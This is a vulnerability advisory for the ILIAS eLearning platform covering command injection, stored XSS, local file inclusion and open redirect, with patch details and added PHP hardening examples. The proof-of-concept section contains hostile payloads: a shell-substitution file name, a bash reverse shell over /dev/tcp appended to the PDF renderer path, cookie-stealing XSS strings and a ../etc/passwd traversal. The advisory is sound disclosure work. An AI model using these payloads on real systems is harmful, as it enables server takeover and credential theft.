SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >
=======================================================================
Title: Multiple critical vulnerabilities
Product: ILIAS eLearning Platform
Vulnerable version: <= 7.15
Fixed version: 7.16
CVE numbers: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,
CVE-2022-45918
Impact: Critical
Homepage: https://www.ilias.de
Found: 2022-09-30
By: Anna Hartig (Office Bochum)
Constantin Schwarz (Office Bochum)
Niklas Schilling (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos company
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"ILIAS has been around since 1998. It is a powerful learning management
system which fulfills all your needs. It integrates tools for small and
large companies, universities, schools and the public sector to create
custom, individual learning scenarios."
Source: https://www.ilias.de/en/
Business recommendation:
------------------------
The vendor provides a patch which should be applied immediately.
SEC Consult strongly recommends a thorough security review of the product
by security professionals in order to identify and resolve potential
further security issues.
Vulnerability overview/description:
-----------------------------------
1) Authenticated Direct OS Command Injection (CVE-2022-45915)
ILIAS uses several third-party programs for tasks such as creating PDF
documents or scanning uploaded files for viruses. These programs are
invoked via the PHP exec() function. In several cases the arguments
passed to exec() contain user input that has not been properly
sanitized. By uploading crafted files or making malicious configuration
changes, an attacker is therefore able to execute arbitrary system
commands with the permissions of the web server user (www-data).
The privileges required for the various command injection instances
range from those of a low-privileged user up to administrator rights.
2) Stored Cross-Site Scripting (CVE-2022-45916)
Multiple stored cross-site scripting vulnerabilities were identified in
ILIAS course items. They can be exploited either by bypassing the
existing XSS filter or simply because input validation is missing
entirely. As a result, attacker-controlled JavaScript code is executed
in the victim's browser.
The attacker needs the permission to create course items, e.g. as a
tutor of a course.
3) Local File Inclusion (CVE-2022-45918)
The SCORM editor includes a debugger which gives authors insight into
the current and all previous sessions of the SCORM player. When the logs
of previous sessions are accessed, the debugger does not validate the
requested file path, which allows arbitrary file system access.
4) Open Redirect (CVE-2022-45917)
The script shib_logout.php redirects the user to the URL given in the
"return" parameter. As this parameter is not validated, an attacker can
use it to redirect victims to arbitrary websites. This is a useful tool
in phishing campaigns, as a malicious website can be hidden behind a
link that appears to lead to the legitimate ILIAS site.
Proof of concept:
-----------------
1) Authenticated Direct OS Command Injection (CVE-2022-45915)
Multiple command injection vulnerabilities were identified in different
places:
a) Upload of ZIP archives
Normal users can submit their solutions for exercises by uploading a ZIP
archive. The archive is extracted on the server and then scanned for
viruses recursively. An attacker can use directory and file names to
inject system commands, e.g. by including a directory named
$(touch /tmp/pwned) in the ZIP archive. With this, an attacker is able
to obtain a reverse shell on the ILIAS web server with the rights of the
web server user (www-data).
b) Creation of media objects
ILIAS can also be configured so that users can create media objects from
files inside an "upload directory". Before such objects are created, the
files are scanned for viruses. An attacker can use the file names to
inject system commands: by placing a file named $(touch /tmp/pwned)
inside the upload directory and then creating a media object from it,
an attacker is able to execute system commands on the server with the
rights of www-data.
c) Creation of PDF documents
ILIAS allows users to export their content as PDF files. A user with
administrator rights can configure the path to the PDF rendering program
of choice. This parameter can be used by an attacker to inject system
commands, because missing validation makes it possible to append further
commands after the path. ILIAS requires "wkhtmltopdf" to be part of the
path, so the payload has to contain it. By changing the path to:
/usr/local/bin/wkhtmltopdf; bash -c "bash -i >& /dev/tcp//13373 0>&1";
an attacker opens a reverse shell with www-data rights that connects to
port 13373 on the attacker's machine as soon as the export function is
triggered.
This vulnerability can be exploited even if no PDF renderer is installed.
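As an added illustration (not ILIAS code), the following PHP contrasts a file name spliced raw into an exec() command line with the same call using escapeshellarg(), and shows a strict check for an administrator-configured renderer path. Commands are only built and printed, never executed; "clamscan" is an assumed stand-in for the scanner binary, and the sample paths are constructed.

```php
<?php
// Added illustration, not ILIAS code: an untrusted file name spliced unquoted into an
// exec() command line versus the same call with escapeshellarg(), plus a strict check
// for the administrator-configured renderer path. Commands are only built and printed
// here, never executed. "clamscan" is an assumed stand-in scanner name.

// Vulnerable shape: the name is concatenated raw, so "$(...)" and ";" reach the shell.
function buildScanCommandUnsafe(string $path): string
{
    return 'clamscan --no-summary ' . $path;
}

// Hardened: escapeshellarg() turns the value into one single-quoted shell word.
function buildScanCommandSafe(string $path): string
{
    return 'clamscan --no-summary ' . escapeshellarg($path);
}

// Hardened handling of a configured executable path (the PDF renderer setting):
// allow only a conservative character set, require an absolute path, and require
// that it resolves to an existing executable file.
function validateRendererPath(string $configured): ?string
{
    if (!preg_match('#^/[A-Za-z0-9._/-]+$#', $configured)) {
        return null;                       // ";", spaces, quotes and "$(" are rejected
    }
    $real = realpath($configured);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return null;
    }
    return $real;
}

// Constructed sample values in the shape the advisory describes.
$hostileName = '/var/www/ilias/upload/$(touch /tmp/pwned)';
echo buildScanCommandUnsafe($hostileName), PHP_EOL;   // a shell would expand $(...) first
echo buildScanCommandSafe($hostileName), PHP_EOL;     // passed through as one literal word
var_dump(validateRendererPath('/usr/local/bin/wkhtmltopdf; id'));  // rejected by the regex
var_dump(validateRendererPath('/bin/sh'));            // accepted only if it exists and is executable
```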
2) Stored Cross-Site Scripting (CVE-2022-45916)
Multiple instances of stored cross-site scripting were identified:
a) Multiple stored XSS in tests
An attacker who is able to create new tests can embed JavaScript code
into them. The XSS payload is triggered when a victim later accesses one
of these tests. The filter applied to the "Question" input field of a
test correctly removes complete HTML tags such as <script>, but it can
easily be bypassed with a half-open HTML tag, e.g.
<img src="x" onerror="alert(document.cookie)"
This HTML tag can be used in the "Introductory message" section of a
test to trigger an XSS. The JavaScript code has to end with a quotation
mark or a space, which separates the HTML tag from the subsequent HTML
tags of the test page.
Furthermore, the "Question" input field of the question type "Long Menu"
was found to have no filtering at all, which allows the use of arbitrary
HTML tags such as <script>.
b) Stored XSS in the title of course items
An attacker who has the right to create course items can conduct a
stored XSS attack by changing the title of the item to
" onclick="alert(document.cookie)"
When the button right above the title is clicked, the XSS payload is
triggered.
c) Stored XSS in HTML sites
An attacker who has the right to modify an HTML learning module can
conduct a stored XSS attack, because it is allowed to add JavaScript code
to the HTML pages. Even if this is intentional, it has to be considered
insecure behaviour and bad practice.
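The filter bypass in 2a) comes down to a filter that only recognises complete tags. As an added illustration (not ILIAS code), the PHP below applies such a filter to the half-open tag from the advisory, shows that the fragment survives and is completed by the next ">" in the page, and contrasts this with output encoding.

```php
<?php
// Added illustration, not ILIAS code: a tag filter that only recognises complete
// "<...>" tags lets a half-open tag through, while contextual output encoding does not.

// Filter of the kind the advisory describes: removes only well-formed tags.
function stripCompleteTags(string $html): string
{
    return preg_replace('/<[^>]*>/', '', $html);
}

// Browser tokenisers close an open tag at the NEXT ">" in the document, even when
// that ">" belongs to the following element. So a fragment without ">" survives the
// filter and still becomes a real <img> element with an onerror handler once rendered.
function renderUnsafe(string $userText): string
{
    return '<div class="intro">' . stripCompleteTags($userText) . '</div><p>next</p>';
}

// Hardened: encode for the HTML text context instead of trying to enumerate tags.
function renderSafe(string $userText): string
{
    $encoded = htmlspecialchars($userText, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="intro">' . $encoded . '</div><p>next</p>';
}

// Constructed input in the shape the advisory shows (no closing ">").
$halfOpen = '<img src="x" onerror="alert(document.cookie)"';
echo renderUnsafe($halfOpen), PHP_EOL;  // the "<img ..." text is untouched: the regex never matched
echo renderSafe($halfOpen), PHP_EOL;    // "&lt;img ..." can no longer become an element
```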
3) Local File Inclusion (CVE-2022-45918)
The SCORM debugger has to be enabled for the whole ILIAS platform. An
attacker can then access the SCORM player debugger and request the logs
of a previous session. By changing the value of the "logFile" query
parameter of the request, arbitrary files of the server's file system
can be read. To read e.g. the passwd file on a Linux system, an attacker
changes the value of the logFile parameter to
"../../../../../../../../../etc/passwd".
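As an added illustration (not ILIAS code), this PHP shows how a "logFile" style parameter can be resolved against a fixed log directory so that traversal sequences and symlinks leading outside it are refused. It assumes PHP 8 (str_starts_with); the log directory, file names and symlink are constructed.

```php
<?php
// Added illustration, not ILIAS code: resolving a user-supplied "logFile" value
// against a fixed log directory and refusing anything that escapes it.
// Assumes PHP 8 (str_starts_with). Directory and file names are constructed.

function resolveLogFile(string $logDir, string $requested): ?string
{
    // First gate: only a bare file name from a small character set, ending in ".log".
    // "../../../../../../../../../etc/passwd" already fails here because of the "/".
    if (!preg_match('/^[A-Za-z0-9_-]+\.log$/', $requested)) {
        return null;
    }
    // Second gate: canonicalise both sides and require containment. This also
    // catches a symlink inside the log directory that points somewhere else.
    $base = realpath($logDir);
    $full = realpath($logDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;   // directory or log file does not exist
    }
    if (!str_starts_with($full, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $full;
}

// Constructed log directory with one session log and one symlink pointing outside.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'scorm_logs_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/session-42.log', "constructed sample log\n");
@symlink('/etc/passwd', $dir . '/escape.log');

var_dump(resolveLogFile($dir, 'session-42.log'));                         // path inside $dir
var_dump(resolveLogFile($dir, '../../../../../../../../../etc/passwd'));  // rejected by the name check
var_dump(resolveLogFile($dir, 'escape.log'));                             // rejected: resolves outside $dir
```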
4) Open Redirect (CVE-2022-45917)
The script shib_logout.php allows an open redirect. The following URL
successfully redirects the user to "https://www.sec-consult.com":
http://ILIAS-URL/shib_logout.php?action=logout&return=https://www.sec-consult.com
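As an added illustration (not ILIAS code), the following PHP validates a post-logout "return" parameter so that only site-relative paths or allow-listed hosts are used as redirect targets, covering the protocol-relative and user-info variants a plain prefix check misses. The allowed host "ilias.example.org" is a constructed placeholder.

```php
<?php
// Added illustration, not ILIAS code: validating a post-logout "return" parameter so
// that only same-site paths or allow-listed hosts become redirect targets.
// The allowed host "ilias.example.org" is a constructed placeholder.

function safeReturnTarget(string $return, array $allowedHosts, string $fallback = '/'): string
{
    // Site-relative path: exactly one leading "/" ("//host" is protocol-relative and
    // "/\host" is treated like "//host" by some browsers), no control characters.
    if (preg_match('#^/(?![/\\\\])[^\x00-\x1F\\\\]*$#', $return)) {
        return $return;
    }
    $parts = parse_url($return);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;
    }
    // Only web schemes, and the host component (not the user-info part) must be
    // allow-listed, so "https://ilias.example.org@other.example/" is rejected too.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        || !in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return $fallback;
    }
    return $return;
}

$allowed = ['ilias.example.org'];
foreach ([
    '/login.php',                               // kept: site-relative path
    'https://ilias.example.org/login.php',      // kept: allow-listed host
    'https://www.sec-consult.com',              // replaced by "/": foreign host
    '//www.sec-consult.com',                    // replaced by "/": protocol-relative
    '/\\www.sec-consult.com',                   // replaced by "/": backslash variant
] as $candidate) {
    echo str_pad($candidate, 40), ' -> ', safeReturnTarget($candidate, $allowed), PHP_EOL;
}
```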
Vulnerable / tested versions:
-----------------------------
The vulnerabilities were identified in ILIAS version 7.14. A quick
analysis of the source code showed that several older versions, back to
version 3.8.4, are vulnerable as well. It is therefore assumed that all
current versions are affected.
Version 7.15 fixed the vulnerabilities only partially; a complete fix is
available in version 7.16.
Vendor contact timeline:
------------------------
2022-10-07: Contacting vendor through [email protected]
2022-10-19
2022-10-25: Extending email recipients to [email protected] and
[email protected], personal email addresses found on the
vendor's website
2022-10-25: Sending advisory to the provided contact
2022-10-30: Vendor requests further information
2022-10-31: Sending detailed PoC
2022-11-10: Asking for current status
2022-11-22: Vendor confirms that patches will be available by 2022-11-25
2022-11-22: Asking for the patched versions mentioned and for the CVE IDs
2022-11-23: Vendor provides information on the patched version; CVE IDs
to be assigned by SEC Consult
2022-11-24: Vendor releases patched version 7.16
2022-12-06: Public release of security advisory
Solution:
---------
Update to ILIAS version 7.16 or higher, available from the vendor's site:
https://docu.ilias.de/goto.php?target=st_229
Workaround:
-----------
None
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia
About the SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult,
an Atos company. It ensures the continued knowledge gain of SEC Consult
in the field of network and application security to stay ahead of the
attacker. The SEC Consult Vulnerability Lab supports high-quality
penetration testing and the evaluation of new offensive and defensive
technologies for our customers. Hence our customers obtain the most
current information about vulnerabilities and valid recommendations
about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested in working with the experts of SEC Consult?
Send us your application: https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices: https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: [email protected]
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF A. Hartig, C. Schwarz, N. Schilling / @2022